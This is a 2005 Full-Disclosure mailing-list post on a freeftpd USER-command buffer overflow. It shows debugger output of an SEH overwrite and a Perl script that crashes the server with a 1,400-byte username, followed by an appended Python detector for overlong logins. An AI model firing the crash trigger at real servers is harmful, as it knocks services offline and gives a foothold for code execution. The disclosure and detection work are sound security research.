
List:       full-disclosure
Subject:    [Full-disclosure] freeftpd USER bufferoverflow
From:       barabas mutsonline <barbsie () gmail ! com>
Date:       2005-11-16 9:56:54
Message-ID: 981281b10511160156x26da1beco2bdd1547b809abe5 () mail ! gmail ! com
Hi,
While drooling over my new Adriana Lima wallpaper, my tongue accidentally
hit my keyboard and more than 1012 chars were sent to the login screen of my
freeftpd server (which I use to back up my Adriana Lima pics). Guess
what...the server crashed! Luckily I attach ollydbg to every process I have
running and this is what I found:
ECX 50505050
EIP 77C460CB msvcrt.77C460CB
Log data, item 0
Address=77C460CB
Message=Access violation when reading [50505050]
77C460CB 8B01 MOV EAX,DWORD PTR DS:[ECX]
Well, EIP doesn't get overwritten, but SEH does:

0012B6CC 41414141
0012B6D0 42424242
0012B6D4 42424242
0012B6D8 43434343 Pointer to next SEH record
0012B6DC 47464544 SE handler

EIP 47464544

Log data, item 0
Address=47464544
Message=Access violation when executing [47464544]
I leave the exploit coding as an exercise...
enjoy
sample crash code:

#!/usr/bin/perl -w
#freeftpd USER buffer overflow
#barabas - 2005

use strict;
use Net::FTP;
my $user="\x41"x1011;
$user .="\x44\x45\x46\x47";#overwrite SEH
$user .="\x50"x400;

# connect to the local freeftpd instance; Debug => 1 echoes the FTP dialogue
my $ftp = Net::FTP->new("127.0.0.1", Debug => 1) or die "connect failed: $@";
$ftp->login("$user","whatevah");

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
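From the defender's side, the simplest check for the condition this post describes is to flag overlong USER/PASS arguments on the FTP control channel. The following Python is an added example, not code from the post or from freeftpd; the sample command lines, the 512-byte alert threshold and the function names are constructed here.

```python
"""Added example (not from the original post): flag overlong FTP USER/PASS
arguments of the kind described in the report, where more than 1012 bytes in
the username crashed freeftpd. Threshold and sample traffic are constructed."""
import re

# RFC 959 command line: 3-4 letter verb, optional argument, CRLF.
_CMD_RE = re.compile(rb"^([A-Za-z]{3,4})(?: ([^\r\n]*))?\r?\n?$")

# The report's crash needed >1012 bytes; alert well below that (assumed value).
USER_LIMIT = 512

def check_ftp_command(line: bytes, limit: int = USER_LIMIT):
    """Return a finding dict for a suspiciously long USER/PASS, else None."""
    m = _CMD_RE.match(line)
    if not m:
        return None
    verb = m.group(1).upper()
    arg = m.group(2) or b""
    if verb not in (b"USER", b"PASS") or len(arg) <= limit:
        return None
    # A long run of one byte value is typical of padding in a crash trigger;
    # record which byte dominates and by how much.
    top_byte = max(set(arg), key=arg.count)
    fraction = arg.count(top_byte) / len(arg)
    return {
        "verb": verb.decode(),
        "length": len(arg),
        "top_byte": top_byte,
        "top_byte_fraction": round(fraction, 2),
    }

def scan_stream(lines, limit=USER_LIMIT):
    """Scan an iterable of raw control-channel lines; return all findings."""
    return [f for f in (check_ftp_command(l, limit) for l in lines) if f]

# Constructed sample traffic: a normal login followed by a username shaped
# like the report's trigger (1011 x 'A', 4 bytes, 400 x 'P').
SAMPLE = [
    b"USER alice\r\n",
    b"PASS s3cret\r\n",
    b"USER " + b"A" * 1011 + b"DEFG" + b"P" * 400 + b"\r\n",
    b"PASS whatevah\r\n",
]

if __name__ == "__main__":
    for finding in scan_stream(SAMPLE):
        print(finding)
```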
